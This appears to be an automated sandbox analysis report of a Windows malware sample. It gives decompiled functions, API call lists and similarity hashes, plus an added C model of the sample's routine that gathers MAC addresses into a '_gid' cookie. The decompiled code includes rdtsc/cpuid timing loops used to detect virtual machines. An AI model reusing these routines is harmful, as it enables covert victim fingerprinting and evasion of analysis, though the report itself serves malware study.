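Added example (not code from the sample or from this report): a stand-alone C model of the adapter walk above, built on struct definitions copied from the public IPHLPAPI declarations so that offsetof() confirms the 0x194 / 0x198 / 0x1c0 constants the decompiler shows. The adapter list is constructed, and rendering each MAC as upper-case hex is an assumption, because the output format of E004D2990 is not visible in the listing.

```c
/* Added example, not code from the sample: models the IP_ADAPTER_INFO walk
 * of the decompiled function. Struct layouts follow the public IPHLPAPI
 * declarations; the hex MAC rendering is an assumption. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_ADAPTER_NAME_LENGTH        256
#define MAX_ADAPTER_DESCRIPTION_LENGTH 128
#define MAX_ADAPTER_ADDRESS_LENGTH     8
#define ERROR_BUFFER_OVERFLOW          111u  /* 0x6f: value tested after the first GetAdaptersInfo call */

typedef struct ip_addr_string {
    struct ip_addr_string *Next;
    char     IpAddress[16];              /* IP_ADDRESS_STRING.String */
    char     IpMask[16];                 /* IP_MASK_STRING.String */
    uint32_t Context;
} ip_addr_string;

/* Leading part of IP_ADAPTER_INFO on x64; the fields after IpAddressList are
 * omitted because they do not influence the offsets examined here. */
typedef struct ip_adapter_info {
    struct ip_adapter_info *Next;        /* offset 0: what the loop follows */
    uint32_t ComboIndex;
    char     AdapterName[MAX_ADAPTER_NAME_LENGTH + 4];
    char     Description[MAX_ADAPTER_DESCRIPTION_LENGTH + 4];
    uint32_t AddressLength;              /* 0x194 */
    uint8_t  Address[MAX_ADAPTER_ADDRESS_LENGTH]; /* 0x198 */
    uint32_t Index;
    uint32_t Type;
    uint32_t DhcpEnabled;
    ip_addr_string *CurrentIpAddress;
    ip_addr_string  IpAddressList;       /* 0x1b8; .IpAddress lands at 0x1c0 */
} ip_adapter_info;

_Static_assert(offsetof(ip_adapter_info, AddressLength) == 0x194, "AddressLength offset");
_Static_assert(offsetof(ip_adapter_info, Address) == 0x198, "Address offset");
_Static_assert(offsetof(ip_adapter_info, IpAddressList) + offsetof(ip_addr_string, IpAddress) == 0x1c0,
               "IpAddressList.IpAddress offset");

/* Same filter as the decompiled loop: drop adapters whose first IP string starts
 * with "0." (0.0.0.0) and require 1..8 MAC bytes, i.e. (AddressLength - 1) <= 7 unsigned. */
static int adapter_selected(const ip_adapter_info *a)
{
    const char *ip = a->IpAddressList.IpAddress;
    if (ip[0] == '0' && ip[1] == '.')
        return 0;
    return (a->AddressLength - 1u) <= 7u;
}

/* Bounded append: output stays NUL-terminated and is truncated at cap - 1. */
static size_t put_str(char *out, size_t cap, size_t n, const char *s)
{
    if (cap == 0)
        return 0;
    while (*s != '\0' && n + 1 < cap)
        out[n++] = *s++;
    out[n] = '\0';
    return n;
}

static size_t put_hex(char *out, size_t cap, size_t n, uint8_t b)
{
    static const char digits[] = "0123456789ABCDEF";
    char pair[3] = { digits[b >> 4], digits[b & 0x0f], '\0' };
    return put_str(out, cap, n, pair);
}

/* "; _gid=" before the first MAC, ":" between the following ones. Returns the
 * number of characters written; 0 is the case where the sample falls back to L6. */
size_t build_gid_cookie(const ip_adapter_info *head, char *out, size_t cap)
{
    const char *sep = "; _gid=";
    size_t n = put_str(out, cap, 0, "");
    for (const ip_adapter_info *a = head; a != NULL; a = a->Next) {
        if (!adapter_selected(a))
            continue;
        n = put_str(out, cap, n, sep);
        for (uint32_t i = 0; i < a->AddressLength; i++)
            n = put_hex(out, cap, n, a->Address[i]);
        sep = ":";
    }
    return n;
}

/* Constructed adapter list (not captured from a real host). */
static ip_adapter_info *constructed_list(void)
{
    static ip_adapter_info a[4];
    memset(a, 0, sizeof a);
    a[0].AddressLength = 6;                               /* MAC present but no IP: skipped */
    memcpy(a[0].Address, "\x00\x15\x5d\x0a\x1b\x2c", 6);
    strcpy(a[0].IpAddressList.IpAddress, "0.0.0.0");
    a[0].Next = &a[1];
    a[1].AddressLength = 6;                               /* collected */
    memcpy(a[1].Address, "\x08\x00\x27\x6e\xe4\x7f", 6);
    strcpy(a[1].IpAddressList.IpAddress, "192.168.56.101");
    a[1].Next = &a[2];
    a[2].AddressLength = 0;                               /* tunnel-style adapter without MAC: skipped */
    strcpy(a[2].IpAddressList.IpAddress, "10.0.0.5");
    a[2].Next = &a[3];
    a[3].AddressLength = 6;                               /* collected, separated by ":" */
    memcpy(a[3].Address, "\x00\xe0\x4c\x68\x01\x02", 6);
    strcpy(a[3].IpAddressList.IpAddress, "172.16.4.9");
    a[3].Next = NULL;
    return a;
}

const char *demo_cookie(void)
{
    static char buf[128];
    build_gid_cookie(constructed_list(), buf, sizeof buf);
    return buf;
}

int main(void)
{
    printf("%s\n", demo_cookie());
    return 0;
}
```

The compile-time asserts are the useful part for an analyst: if they pass, the three constants in the decompiled loop are exactly AddressLength, Address and IpAddressList.IpAddress.String of IP_ADAPTER_INFO, which pins the loop down as MAC collection keyed on adapters that hold an IPv4 address.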

[Disassembly listing for this function: instruction addresses 0x004d27bc to 0x004d28fc; the instruction text is not preserved in this extraction]

APIs
• GetAdaptersInfo.IPHLPAPI(?,?,00000000,004D2CFE,?,?,00000003,004D24A4), ref: 004D280F
• GetAdaptersInfo.IPHLPAPI(?,?,00000000,004D2CFE,?,?,00000003,004D24A4), ref: 004D2845
Memory Dump Source
• Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
Similarity
• API ID: AdaptersInfo
• String ID:
• API String ID: 3177971545-0
• Opcode ID: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
• Instruction ID: 640fd6e994e8b85b59bf5d23c13764b50939707544c12c454c9a095b7eda267b
• Opcode Fuzzy Hash: fc699fa13e68b788d874d6a78f58e359039745370b383d3aa825a9febfb906a8
• Instruction Fuzzy Hash: 6A31BCB1601B8192EB16EB22E92479A77A0EB99F94F488127DF0D07754EF7CC54AC308
Uniqueness

Uniqueness Score: -1.00%

APIs
• NtQuerySystemInformation.NTDLL(?,?,00000000,004D2CB1,?,?,00000003,004D24A4), ref: 004D16CB
                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(?,?,00000000,004D2CB1,?,?,00000003,004D24A4), ref: 004D1709
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeapInformationQuerySystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3114120137-0
                                                                                                                                                                                                                                • Opcode ID: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                • Instruction ID: 50c64a38bf8b735e08e72e81272f015caf6e3c44c2b8df7739c4485be1159b55
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 15ab51baa947bc1f3c3fdf1eb6848148db47552542206cc3bcd8ce7c2f187386
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 632151B5715B4093EF158F92A86436A62A1BB85BD1F588037DF4A47774EF3CC8468708
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                • Opcode ID: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                • Instruction ID: e4e1c387bbf544278926b0d97cc4a6c29175b3066dbfc2a2dbff07b23cb747f9
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c3a72f5bfcfd91918b5e83c3bb15c180b6cc2b39742bdcf2d413e26ac2e8c0cf
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5471AF72301B9297EB24CF66E8647AA37A1FB89B94F448127DF4A43B24DF38C555C704
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LookupAccountNameW.ADVAPI32 ref: 004D233C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AccountLookupName
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1484870144-0
                                                                                                                                                                                                                                • Opcode ID: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                                • Instruction ID: 243bc6c03c7c6f8ec5e480a334a78569e8efa235cbcebb34653b0ac824297d4c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cafe0df7641921cb4b3b83197fca258bc474e661d5f4a52d45703bbf776aa30b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E3159B2701A418AEB128FB5E95439A33E4EB98B88F584137DF4D97B18EF38C549C354
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                C-Code - Quality: 58%
                                                                                                                                                                                                                                			E004D2434(void* __eax, signed long long __rax, signed long long __rbx, signed int __rcx, signed long long __rdx, long long __rdi, void* __rsi, void* __r9, void* __r11, void* __r14) {
                                                                                                                                                                                                                                				void* __rbp;
                                                                                                                                                                                                                                				void* _t27;
                                                                                                                                                                                                                                				void* _t40;
                                                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                                                				signed long long _t51;
                                                                                                                                                                                                                                				signed long long _t52;
                                                                                                                                                                                                                                				signed long long _t64;
                                                                                                                                                                                                                                				long long _t69;
                                                                                                                                                                                                                                				void* _t73;
                                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                                				void* _t82;
                                                                                                                                                                                                                                
                                                                                                                                                                                                                                				_t82 = __r9;
                                                                                                                                                                                                                                				_t71 = __rsi;
                                                                                                                                                                                                                                				_t69 = __rdi;
                                                                                                                                                                                                                                				_t64 = __rdx;
                                                                                                                                                                                                                                				_t52 = __rbx;
                                                                                                                                                                                                                                				_t51 = __rax;
                                                                                                                                                                                                                                				 *((long long*)(_t75 + 0x18)) = __rbx;
                                                                                                                                                                                                                                				 *((long long*)(_t75 + 0x20)) = __rdi;
                                                                                                                                                                                                                                				_t73 = _t75 - 0x57;
                                                                                                                                                                                                                                				_t4 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                				_t40 = _t4;
                                                                                                                                                                                                                                				goto L1;
                                                                                                                                                                                                                                				L9:
                                                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                                                				L1:
                                                                                                                                                                                                                                				asm("rdtsc");
                                                                                                                                                                                                                                				_t64 = _t64 << 0x20;
                                                                                                                                                                                                                                				_t51 = _t51 | _t64;
                                                                                                                                                                                                                                				_t52 = _t52 << 0x00000010 | __rcx;
                                                                                                                                                                                                                                				SleepEx(??, ??); // executed
                                                                                                                                                                                                                                				_t69 = _t69 - 1;
                                                                                                                                                                                                                                				if(_t69 != 0) {
                                                                                                                                                                                                                                					goto L1;
                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                					wsprintfA();
                                                                                                                                                                                                                                					E004D11FC(_t73 - 0x29, _t52);
                                                                                                                                                                                                                                					_t37 = E004D153C(_t73 - 0x29);
                                                                                                                                                                                                                                					E004D2C08( *((intOrPtr*)(_t73 + 0x17)), _t23, _t40, _t51, _t52, __rsi, _t73, _t73 - 0x49, _t82);
                                                                                                                                                                                                                                					_t44 = _t51;
                                                                                                                                                                                                                                					if(_t51 != 0) {
                                                                                                                                                                                                                                						_t80 = _t73 + 0x67;
                                                                                                                                                                                                                                						if(E004D1EEC(_t37, _t44, _t51, _t52, _t73 + 0x1b, _t51, _t71, _t73, _t73 + 0x67, _t73 + 0x6f, __r11, __r14) != 0) {
                                                                                                                                                                                                                                							_t67 =  *((intOrPtr*)(_t73 + 0x6f));
                                                                                                                                                                                                                                							if( *((intOrPtr*)(_t73 + 0x6f)) >= 0x400) {
                                                                                                                                                                                                                                								_t27 = E004D272C(0, _t37, _t40,  *((intOrPtr*)(_t73 + 0x67)), _t67, _t69, _t73, _t80, __r11, __r14);
                                                                                                                                                                                                                                								_t55 =  *((intOrPtr*)(_t73 + 0x67));
                                                                                                                                                                                                                                								_t41 = _t27;
                                                                                                                                                                                                                                								if( *((intOrPtr*)(_t73 + 0x67)) != 0) {
                                                                                                                                                                                                                                									GetProcessHeap();
                                                                                                                                                                                                                                									HeapFree(??, ??, ??);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                								E004D1FD0(_t41, _t51, _t55, _t73 - 0x49, _t71);
                                                                                                                                                                                                                                								_t49 = _t51;
                                                                                                                                                                                                                                								if(_t51 != 0) {
                                                                                                                                                                                                                                									E004D2A1C(_t49, _t73 + 0x1b, _t51);
                                                                                                                                                                                                                                								}
                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                					goto L9;
                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                 			}
Disassembly graph addresses (only the instruction addresses survived extraction; instruction text is not present): 0x004d2434 0x004d2434 0x004d2434 0x004d2434 0x004d2434 0x004d2434 0x004d2434 0x004d2439 0x004d243f 0x004d244d 0x004d244d 0x004d244d 0x004d2512 0x004d2528 0x004d2450 0x004d2454 0x004d2456 0x004d245a 0x004d2460 0x004d2468 0x004d246e 0x004d2472 0x00000000 0x004d2474 0x004d2482 0x004d248c 0x004d249d 0x004d249f 0x004d24a4 0x004d24a7 0x004d24b0 0x004d24bf 0x004d24c1 0x004d24cc 0x004d24d2 0x004d24d7 0x004d24db 0x004d24e0 0x004d24e2 0x004d24f0 0x004d24f0 0x004d24fc 0x004d2501 0x004d2504 0x004d250d 0x004d250d 0x004d2504 0x004d24cc 0x004d24bf 0x00000000 0x004d24a7

APIs
Memory Dump Source
• Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
• Opcode ID: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
• Instruction ID: 28d42934f20eed8785c79cf934048ed4a16f74c2843cdefae179293d6ead1ff8
• Opcode Fuzzy Hash: 20254b6f6f1ff962b78622cb32e4c72357f2ae928b9d5189ffb1cb94102db212
• Instruction Fuzzy Hash: 4F215E72300A40AADB119FB1E5607DD33A1EB98788F48442BDF4D57758EE3CD545C354
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2100817317.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2100813455.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100821985.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100829495.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100833104.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: AllocVirtual
• String ID: 2$7$EiFgBnIoIsIqIrIsJhJeJfJg;o;nJjJk?dJmJnJoJpJqJrJs?d;e;f;g;h;i;j;k;l;m;n;o;p;q;r;s<d<e<f<g<h<i<j<k<l<m<n<o<p<q<r<s=d=e=f=gGh=i=j=k=j>jDd=i=pDm=kIf<eCm>gBsJm<hAf@s@e?n<n?o?r@f@m?q=e=pAf=d=i=o=l=l>pAm=l=rAp>s>o=eBd>l>pBg<d<n;iBk>i>j>r>rBf@d@g@i?hAeAfAgAhAiAjAk?qEl$G$G$G$G$G$G$G
• API String ID: 4275171209-1517691801
• Opcode ID: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
• Instruction ID: ca2938b5bc2ab7f46aca023ee6394d65c54054d49ca74a4c487f6248e662f014
• Opcode Fuzzy Hash: 9f30d811a221398f518b31910462adcca0b5cd8e48923cbb55d48ba8a3c95936
• Instruction Fuzzy Hash: 0451E0B251D6C5CAE3A18B28B49479BBFA0F386358F105128E6CD4BBA9C37DC518CF44
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2100817317.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2100813455.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100821985.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100829495.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100833104.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: Thread$CreateCurrentDuplicateHandleObjectPriorityResumeSingleWait
• String ID: DllRegisterServer$G$_
• API String ID: 1174013218-1650116920
• Opcode ID: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
• Instruction ID: 3f6dfe96583287e2132e89248d3fe6d141595118fd8055dab05f5fe12df3ddc3
• Opcode Fuzzy Hash: fb96d5351e15185721c7c678f22100d1a9f993aebe460c17edc53ec82f678213
• Instruction Fuzzy Hash: 30310772908B868AE7A4CF25F84435AB7E1F7893A4F504039E68C97B78DB3DD1448F40
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2100817317.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2100813455.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100821985.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100829495.000007FEF8FBE000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100833104.000007FEF8FC0000.00000002.00020000.sdmp
Similarity
• API ID: AllocVirtual
• String ID: @
• API String ID: 4275171209-2766056989
• Opcode ID: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
• Instruction ID: 93e7fb77665375a9f577d392b660a0ccbaf77ebf490505a570474afec7383057
• Opcode Fuzzy Hash: 81cc5fa61e63df9641c82d5ec4088076d96df196aa3fedfd4a34d15b22035c1b
• Instruction Fuzzy Hash: 62326C76609BC58AD7B5CB56F49079AB7A5F789B90F10802AEACC93B18DB3CC154CF01
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
Similarity
• API ID: ExitProcessSleepUser
• String ID:
• API String ID: 354099737-0
• Opcode ID: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
• Instruction ID: 13eae77555258112db51aeec6f4f6118df6291359de66e63a1b21950defee537
• Opcode Fuzzy Hash: 0042952dd3aad89d8123fb1b19f0e5b4d8c6ab7462fdf89570b08f587bfd53b2
• Instruction Fuzzy Hash: 21C01270200680D3E21F6724EA687282224A78030AF00061B830205BA08F3C04C8824B
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000004.00000002.2100817317.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
• Associated: 00000004.00000002.2100813455.000007FEF8FB0000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100821985.000007FEF8FB5000.00000002.00020000.sdmp
• Associated: 00000004.00000002.2100829495.000007FEF8FBE000.00000002.00020000.sdmp
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100833104.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                • Opcode ID: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                                • Instruction ID: 9dbeb4177cc0291c960bbfa91b59b6af253aaf81e4de24522d48fd320fe39546
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 71a4d3e6afc3869dd51c089c56fbff1864f24b1d1d871186f2474ca292a1132a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49D13F76509BC586D764CB59F49039AB7A1F3C9790F10802AEBCD93B68DF79C4948F40
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,0000011C,004D1E13), ref: 004D264B
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 1721193555-0
                                                                                                                                                                                                                                • Opcode ID: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                                • Instruction ID: 6221b11e3f3113de9d37120006ce52089748759dcd53549c5060e51776a93c93
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e07d5386416b452ae357def83d54998eea7d12d9b96eaf79d3048644093a814a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82E01272724645D3DF12EB20E8543993361FBD4704F844127969E426A4EF7CC65DC708
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                • Opcode ID: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                                • Instruction ID: 270b5c2ae13bb61eafc288b58ca37cc214afc129cdbd71e70cecd6b0dd039a3c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d810e3ef372af79f05ccbcc8a3c3fc3137e58aa0d92ff2561a569d39733649b8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37D0A7B2F1024093E7319710EA2679A2311F3D4315F804207CA4944A64CF3CC158C608
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2100817317.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100813455.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100821985.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100829495.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100833104.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: %
                                                                                                                                                                                                                                • API String ID: 0-2567322570
                                                                                                                                                                                                                                • Opcode ID: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                • Instruction ID: ab3488ce0eceea3ee0bc7ce3bd4693e277bc5914e51a9d1bbe048e8b25635434
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c9ee2add8f40c47592069122d8a0d8c3d159a18c784029c3ab9a24ce0be2f6a
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E42A0B6A0C7D58AD7B08F15E0503ABBBE1F789744F10512AEAC986B59EB3CC480DF11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000004.00000002.2100817317.000007FEF8FB1000.00000020.00020000.sdmp, Offset: 000007FEF8FB0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100813455.000007FEF8FB0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100821985.000007FEF8FB5000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100829495.000007FEF8FBE000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000004.00000002.2100833104.000007FEF8FC0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                • Instruction ID: eaee352713882f45d60a20d6ad9de963d35200938772eb6fe9546e390b03a86b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18e12339979919f4a0dc9a07f2e75115fd9bef9f15be47883a766d79ea54979f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4AC1A977A18BC586D760CF1AE44179ABBA4F3987D0F00852AEA9D83B69DB7CC450CF50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

C-Code - Quality: 74%
			E004D1E50(intOrPtr __ebx, intOrPtr __edx, signed long long __rax, long long __rbx, signed long long __rdx, signed long long __rsi) {
				signed int _t18;
				signed long long _t31;
				signed long long _t34;
				signed long long _t41;
				signed long long _t42;
				signed long long _t43;
				signed long long _t44;
				void* _t45;
				signed long long _t47;
				long long _t49;
				void* _t51;
				void* _t52;

				_t47 = __rsi;
				_t41 = __rdx;
				_t31 = __rax;
				 *((long long*)(_t51 + 8)) = __rbx;
				 *((long long*)(_t51 + 0x10)) = _t49;
				 *((long long*)(_t51 + 0x18)) = __rsi;
				_push(_t45);
				_t52 = _t51 - 0x30;
				do {
					SwitchToThread();
					asm("rdtsc");
					_t42 = _t41 << 0x20;
					asm("cpuid");
					 *((intOrPtr*)(_t52 + 0x20)) = 1;
					 *((intOrPtr*)(_t52 + 0x24)) = __ebx;
					 *((intOrPtr*)(_t52 + 0x28)) = 0;
					 *((intOrPtr*)(_t52 + 0x2c)) = __edx;
					asm("rdtsc");
					_t43 = _t42 << 0x20;
					_t34 = (_t31 | _t42 | _t43) - (_t31 | _t42);
					_t45 = _t45 + _t34;
					_t18 = SwitchToThread();
					asm("rdtsc");
					_t44 = _t43 << 0x20;
					asm("rdtsc");
					_t41 = _t44 << 0x20;
					_t31 = (_t34 | _t44 | _t41) - (_t34 | _t44);
					_t47 = _t47 + _t31;
					_t49 = _t49 - 1;
				} while (_t49 != 0);
				return _t18 / _t47;
			}

Memory Dump Source
• Source File: 00000004.00000002.2096616155.00000000004D0000.00000040.00000001.sdmp, Offset: 004D0000, based on PE: true
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
• Instruction ID: f3e1b554dc7274fed7b5a62bf9fe70d6722a63b38e138c448283c37a8f7b1c3a
• Opcode Fuzzy Hash: 2318fb796138583acd0950f01f63cac7e4af46243d00b3ebc09f9ecd2c5c3d1b
• Instruction Fuzzy Hash: 4201B5B2B14B908BDF248F36B600349B6A2F38D7C0F148536DB9C43B18DA3CD4958B04
Uniqueness
Uniqueness Score: -1.00%